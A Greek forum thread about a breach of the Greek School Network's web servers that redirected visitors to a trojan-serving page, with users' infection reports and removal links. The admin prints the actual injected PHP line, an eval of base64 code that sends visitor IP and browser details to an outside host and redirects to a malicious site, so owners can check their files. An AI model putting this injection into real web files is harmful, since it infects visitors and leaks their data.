Θέμα: Παραβίαση ασφαλείας των σελίδων του ΠΣΔ

[alkisg]

Σήμερα για κάποιες ώρες το φόρουμ είχε παραβιαστεί, πιθανώς λόγω κάποιου κενού ασφαλείας του SMF.
Το αποτέλεσμα ήταν ότι σε κάθε επίσκεψη ο χρήστης μεταφερόταν για λίγο σε κάποια άλλη σελίδα που είχε το "TrojanDownloader:Java/Exdoer", και ανάλογα με το λειτουργικό, τον browser και το αντιιικό του υπήρχε περίπτωση να κολλήσει.

Επανέφερα το φόρουμ όπως ήταν πριν την παραβίαση, αλλά δεν έχει ακόμα ανακοινωθεί κάποιο κενό ασφαλείας από την εταιρία Simple Machines που αναπτύσσει το λογισμικό SMF του φόρουμ, ούτε έχει βγει κάποια διόρθωση, επομένως δεν υπάρχει εγγύηση ότι αυτό δεν θα ξανασυμβεί.

Έτσι για τις επόμενες μέρες καλό θα είναι οι χρήστες του φόρουμ να είναι προσεκτικοί κατά την επίσκεψή τους.

[poursali]

και από ότι είδα ανακαλύφτηκε σήμερα από την microsoft... όσοι νομίζουν ότι έχουν προσβληθεί καλύτερα να περιορίσουν τη χρήση του υπολογιστή μέχρι να έχει ενημερωθεί το αντιικό...

[dim]

....

καλύτερα να περιορίσουν τη χρήση του υπολογιστή

να είναι προσεκτικοί κατά την επίσκεψή τους.

Τι ακριβώς δηλαδή να κάνουμε?
Πως γίνεται το να είμαι προσεκτική κατά την επίσκεψή μου...    και πως γίνεται να περιορίσω τη χρήση...
Υπάρχει κάποιο χαπάκι....... αντιβίωση ίσως?

[nikosx]

εγώ πάντως κόλλησα πολύ πράγμα και ο desktop έχει σχεδόν πεθάνει

[poursali]

μια λύση είναι αυτή: http://www.bleepingcomputer.com/virus-removal/remove-ms-removal-tool

δεν την έχω ελέγξει μιας και έχω λινουξ

@dim: το λέω πχ για κάποιον που κάνει συναλλαγές μέσω ιντερνετ, web banking κλπ και επίσης για όσους δεν θα ήθελαν να χάσουν κάποιο σημαντικό αρχείο - κυρίως τα δεδομένα μας νοιάζουν πάντα

[evry]

http://www.geekpolice.net/t26522-remove-ms-removal-tool-removal-guide

το παραπάνω το δοκίμασα γιατί κόλλησε ο ένας υπολογιστής και είναι οκ.

με το linux δεν υπάρχει πρόβλημα

[pgrontas]

και από ότι είδα ανακαλύφτηκε σήμερα από την microsoft... όσοι νομίζουν ότι έχουν προσβληθεί καλύτερα να περιορίσουν τη χρήση του υπολογιστή μέχρι να έχει ενημερωθεί το αντιικό...

Πάντως σε μένα το Microsoft Security Essentials το μπλόκαρε εξαρχής και δεν φαίνεται να έχω κολλήσει τίποτα.

[poursali]

Πάντως σε μένα το Microsoft Security Essentials το μπλόκαρε εξαρχής και δεν φαίνεται να έχω κολλήσει τίποτα.

ίσως είχε προλάβει το δικό σου να ενημερωθεί

[petrosp13]

Δημιούργησε χοντρό πρόβλημα αυτό που κατέβαινε από την σελίδα, αλλά το επανέφερα σε safe mode
Δεν άφηνε κανένα πρόγραμμα να ανοίξει, δεν άφηνε το CTRL+ALT+DEL, έκλεισε ακόμα και τα υπάρχοντα προγράμματα

[tom]

Εμένα το AVG Internet Security "ξηγήθηκε"  .

[amichail]

Και εμένα το έπιασε το avast antivirus. Αλλά είχε όλο το sch.gr πρόβλημα, δεν έμπαινε ούτε στο webmail ούτε πουθενά. Ούτε και σε πολλές άλλες σελίδες.
Αφού για μια στιγμή σκέφτηκα μήπως ήταν false positive.
Μετά άλλαξα σε Ubuntu, έψαξα ανενόχλητη πλέον στο google και είδα ότι έχει κάνει μεγάλη ζημιά ... άρχισε κατά κύματα και ήταν πλέον σε μορφή χιονοστιβάδας.

[geokra]

μια λύση είναι αυτή: http://www.bleepingcomputer.com/virus-removal/remove-ms-removal-tool

δεν την έχω ελέγξει μιας και έχω λινουξ

@dim: το λέω πχ για κάποιον που κάνει συναλλαγές μέσω ιντερνετ, web banking κλπ και επίσης για όσους δεν θα ήθελαν να χάσουν κάποιο σημαντικό αρχείο - κυρίως τα δεδομένα μας νοιάζουν πάντα

Και γω το ίδιο κόλλησα, αλλά είναι και λίγο επίμονο το άτιμο, δεν βγαίνει και εύκολα.

[Λάμπρος Μπουκουβάλας]

εγώ δεν αντιμετώπισα κανένα πρόβλημα.
πρέπει να το παραδεχθείτε, έχω τον καλύτερο και ασφαλέστερο υπολογιστή του κόσμου! 

[alkisg]

Χρόνια πολλά σε όλους.

Τελικά το κενό ασφαλείας δεν ήταν στο φόρουμ (SMF) αλλά κάπου πιο κεντρικά στο ΠΣΔ, είτε στον apache, είτε, χειρότερα ακόμα, με τοπική πρόσβαση στο file system του web server. Συγκεκριμένα φαίνεται να προσέβαλε μαζικά πολλούς ιστοχώρους χρηστών του ΠΣΔ, γράφοντας σε όσα αρχεία .php μπορούσε, δηλαδή σε αυτά που είχαν write access στο "others".
Ο trojan έμπαινε στην αρχή αυτών των αρχείων php, με την παρακάτω κρυπτογραφημένη μορφή:

Κώδικας: PHP

1. <?php
2. eval(base64_decode('Z2xvYmFsICRyZXNwb25zZV9zZXNzaW9uczsNCg0KaWYoISRyZXNwb25zZV9zZXNzaW9ucykgew0KCSRyZXNwb25zZV9zZXNzaW9ucyA9ICJhbGl2ZSI7DQoNCgkkcz1iYXNlNjRfZW5jb2RlKHN0cnJldihiYXNlNjRfZW5jb2RlKHN0cl9yZXBsYWNlKCd8JywnJywkX1NFUlZFUlsnUkVNT1RFX0FERFInXSkuJ3wnLnN0cl9yZXBsYWNlKCd8JywnJywkX1NFUlZFUlsnSFRUUF9BQ0NFUFQnXSkuJ3wnLnN0cl9yZXBsYWNlKCd8JywnJywkX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5UJ10pKSkpOw0KCSR1PSdodHRwOi8vbWRteXNzZC5jei5jYy94cC9zZXNzaW9uLnBocCc7DQoJJHM9QGZpbGVfZ2V0X2NvbnRlbnRzKCIkdT90PSRzIik7DQoNCglpZihjb3VudCgkaHR0cF9yZXNwb25zZV9oZWFkZXIpKSB7DQoJCSRyZWxvYyA9ICcnOw0KCQlmb3JlYWNoKCRodHRwX3Jlc3BvbnNlX2hlYWRlciBhcyAkdikgew0KCQkJJHQ9ZXhwbG9kZSgiOiAiLCR2KTsNCgkJCWlmKHN0cnRvbG93ZXIodHJpbSgkdFswXSkpPT0ibG9jYXRpb24iKSB7DQoJCQkJJHJlbG9jID0gdHJpbSgkdFsxXSk7DQoJCQl9DQoJCX0NCgkJaWYoJHJlbG9jICYmICFzdHJsZW4oc3RycG9zKCRyZWxvYywnMDAwMDEwMjAnKSkpIHsNCgkJCWlmKCFAaGVhZGVyc19zZW50KCkpIHsNCgkJCQlAaGVhZGVyKCJIVFRQLzEuMSAzMDIgRm91bmQiKTsNCgkJCQlAaGVhZGVyKCJWYXJ5OiBBY2NlcHQtRW5jb2RpbmcsVXNlci1BZ2VudCIpOw0KCQkJCUBoZWFkZXIoIkxvY2F0aW9uOiAkcmVsb2MiKTsNCgkJCX0gZWxzZSB7DQoJCQkJZWNobyAiPGgzPlBhZ2UgTW92ZWQ8L2gzPlRoZSBwYWdlIHlvdSBhcmUgdHJ5aW5nIHRvIG9wZW4gaGFzIGJlZW4gbW92ZWQuPGJyPjxicj5Vc2UgdGhlIG5hdmlnYXRpb24gbGlua3Mgb24gdGhlIHJpZ2h0IG9mIHRoaXMgcGFnZSwgdGhlIHNlYXJjaCBib3ggYXQgdGhlIHRvcCwgb3IgdGhlIHNpdGUgbWFwIGxpbmsgYmVsb3cgdG8gZmluZCB0aGUgbmV3IGxvY2F0aW9uIG9mIHRoZSBwYWdlIHlvdSdyZSBzZWVraW5nLjxicj48YnI+Q2xpY2sgdGhlIGxpbmsgYmVsb3cgdG8gZm9sbG93IG5ldyB1cmwuPGJyPjxicj48YSBocmVmPVwiIi4kdS4iXCI+Ii4kdS4iPC9hPiI7DQoJCQkJZWNobyAic2NyaXB0IHR5cGU9XCJ0ZXh0L2phdmFzY3JpcHRcIj5kb2N1bWVudC5sb2NhdGlvbiA9IFwiIi4kdS4iXCI7PC9zY3JpcHQ+IjsNCgkJCX0NCgkJCWV4aXQ7DQoJCX0NCgl9DQp9'));?><?php και εδώ συνεχίζει το αρχικό αρχείο...
3.  

Αν έχετε ιστοχώρο στο ΠΣΔ με php αρχεία, αν θέλετε ρίξτε μια ματιά να δείτε αν κάποια από αυτά τροποποιήθηκαν στις 13/4, κι αν ναι, ελέξτε ότι δεν ξεκινάνε με την παραπάνω γραμμή.

Είχα αναφέρει το πρόβλημα στο helpdesk.sch.gr και τους πρότεινα να κάνουν μια κεντρική ανακοίνωση για να ενημερώσουν όλους τους εκπαιδευτικούς για το πρόβλημα, ώστε τουλάχιστον όσοι κόλλησαν να αφαιρέσουν τον ιό. Σήμερα μου απάντησαν ότι είναι ενήμεροι και έκλεισαν το σχετικό δελτίο.

[new2011]

Καλησπέρα,
Το web site του Π. Τσιωτάκη βγάζει  το εξής μήνυμα :

Προειδοποίηση- η επίσκεψη σε αυτόν τον ιστότοπο μπορεί να προκαλέσει ζημία στον υπολογιστή σας!

Τι συμβαίνει ?